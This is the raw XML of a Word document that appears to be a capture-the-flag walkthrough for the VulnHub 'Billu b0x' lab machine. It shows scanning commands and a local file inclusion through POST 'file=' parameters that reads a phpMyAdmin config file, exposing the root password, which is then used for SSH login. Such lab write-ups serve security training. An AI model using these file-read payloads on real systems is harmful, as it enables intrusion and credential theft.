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FB1" w:rsidRDefault="004C55BA">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C70FB1">
        <w:instrText>https://www.vulnhub.com/entry/billu-b0x,188/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00056F1A">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://www.vulnhub.com/entry/billu-b0x,188/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003212F4" w:rsidRDefault="00E02032">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51056EC0" wp14:editId="46641757">
            <wp:extent cx="5943600" cy="1642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C4" w:rsidRDefault="001C4CC4" w:rsidP="001C4CC4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E02032" w:rsidRDefault="001C4CC4" w:rsidP="001C4CC4">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 192.168.21.135</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C4CC4" w:rsidRDefault="00C56D54" w:rsidP="001C4CC4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DF83B0A" wp14:editId="1900DA62">
            <wp:extent cx="5943600" cy="2656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D54" w:rsidRDefault="00C56D54" w:rsidP="001C4CC4"/>
    <w:p w:rsidR="00731FBE" w:rsidRDefault="001D4E28" w:rsidP="001C4CC4">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00731FBE" w:rsidRPr="00056F1A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.135/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00731FBE" w:rsidRDefault="00731FBE" w:rsidP="001C4CC4"/>
    <w:p w:rsidR="00731FBE" w:rsidRDefault="00001DB6" w:rsidP="001C4CC4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B2972CA" wp14:editId="24092C97">
            <wp:extent cx="5943600" cy="3361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B6" w:rsidRDefault="00001DB6" w:rsidP="001C4CC4"/>
    <w:p w:rsidR="00772A07" w:rsidRDefault="00772A07" w:rsidP="00772A0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001DB6" w:rsidRDefault="00772A07" w:rsidP="00772A07">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://192.168.21.135/ /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/big.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00772A07" w:rsidRDefault="00036812" w:rsidP="00772A07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C54F909" wp14:editId="7BE13036">
            <wp:extent cx="5838825" cy="7343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12" w:rsidRDefault="000445FB" w:rsidP="00772A07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B8158ED" wp14:editId="77CCB9E7">
            <wp:extent cx="5591175" cy="7010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FB" w:rsidRDefault="00004E52" w:rsidP="00772A07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38E1B5E8" wp14:editId="649B6F11">
            <wp:extent cx="5676900" cy="424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52" w:rsidRDefault="00004E52" w:rsidP="00772A07"/>
    <w:p w:rsidR="00D9144A" w:rsidRDefault="001D4E28" w:rsidP="00772A07">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00D9144A" w:rsidRPr="00056F1A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.135/test.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D9144A" w:rsidRDefault="0023753A" w:rsidP="00772A07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4876B2C8" wp14:editId="46D5AB8D">
            <wp:extent cx="5915025" cy="1400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4C" w:rsidRDefault="0046404F" w:rsidP="00772A07">
      <w:r>
        <w:t>Forward the request to repeater and change the request from GET to POST and in body type below mention content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E43C38" w:rsidRDefault="00E43C38" w:rsidP="00772A07">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E43C38">
        <w:t>file=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E43C38">
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E43C38" w:rsidRDefault="00661900" w:rsidP="00772A07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C7B3F67" wp14:editId="28F93B5C">
            <wp:extent cx="5943600" cy="2715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4C" w:rsidRDefault="006B634C" w:rsidP="00772A07">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B634C">
        <w:t>file=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B634C">
        <w:t>c.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD5167" w:rsidRDefault="001C42C2" w:rsidP="00772A07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3434A7C4" wp14:editId="5D636020">
            <wp:extent cx="5943600" cy="238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07" w:rsidRDefault="004B6D07" w:rsidP="00772A07">
      <w:r w:rsidRPr="004B6D07">
        <w:t>file=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B6D07">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B6D07">
        <w:t>/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B6D07">
        <w:t>phpmy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B6D07">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B6D07">
        <w:t>config.inc.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001C42C2" w:rsidRDefault="001C42C2" w:rsidP="00772A07"/>
    <w:p w:rsidR="004834AB" w:rsidRDefault="004834AB" w:rsidP="00772A07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A595BB0" wp14:editId="50E48727">
            <wp:extent cx="5943600" cy="3140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AB" w:rsidRDefault="004834AB" w:rsidP="00772A07">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004834AB" w:rsidRDefault="004834AB" w:rsidP="00772A07"/>
    <w:p w:rsidR="004834AB" w:rsidRDefault="004834AB" w:rsidP="004834AB">
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'Servers'][$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]['user'] = 'root';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004834AB" w:rsidRDefault="004834AB" w:rsidP="004834AB">
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'Servers'][$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]['password'] = '</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:t>roottoor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004834AB" w:rsidRDefault="004834AB" w:rsidP="004834AB"/>
    <w:p w:rsidR="0013726C" w:rsidRDefault="0013726C" w:rsidP="0013726C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13726C" w:rsidRDefault="0013726C" w:rsidP="0013726C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root@192.168.21.135       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013726C" w:rsidRDefault="009672A2" w:rsidP="0013726C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C62B9B2" wp14:editId="16E61A96">
            <wp:extent cx="5943600" cy="5089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AB" w:rsidRDefault="004834AB" w:rsidP="004834AB"/>
    <w:sectPr w:rsidR="004834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438"/>
    <w:rsid w:val="00001DB6"/>
    <w:rsid w:val="00004E52"/>
    <w:rsid w:val="00036812"/>
    <w:rsid w:val="000445FB"/>
    <w:rsid w:val="00054FCE"/>
    <w:rsid w:val="0013726C"/>
    <w:rsid w:val="001C42C2"/>
    <w:rsid w:val="001C4CC4"/>
    <w:rsid w:val="001D4E28"/>
    <w:rsid w:val="0023753A"/>
    <w:rsid w:val="003212F4"/>
    <w:rsid w:val="0046404F"/>
    <w:rsid w:val="004834AB"/>
    <w:rsid w:val="00486438"/>
    <w:rsid w:val="004B6D07"/>
    <w:rsid w:val="004C55BA"/>
    <w:rsid w:val="00630F8A"/>
    <w:rsid w:val="00661900"/>
    <w:rsid w:val="006B634C"/>
    <w:rsid w:val="00731FBE"/>
    <w:rsid w:val="00772A07"/>
    <w:rsid w:val="009672A2"/>
    <w:rsid w:val="00C56D54"/>
    <w:rsid w:val="00C70FB1"/>
    <w:rsid w:val="00CD5167"/>
    <w:rsid w:val="00D9144A"/>
    <w:rsid w:val="00E02032"/>
    <w:rsid w:val="00E4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23F386-9F63-4DF3-A969-0D9F7C453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1F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192.168.21.135/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.21.135/test.php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46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-26T14:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-01T11:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>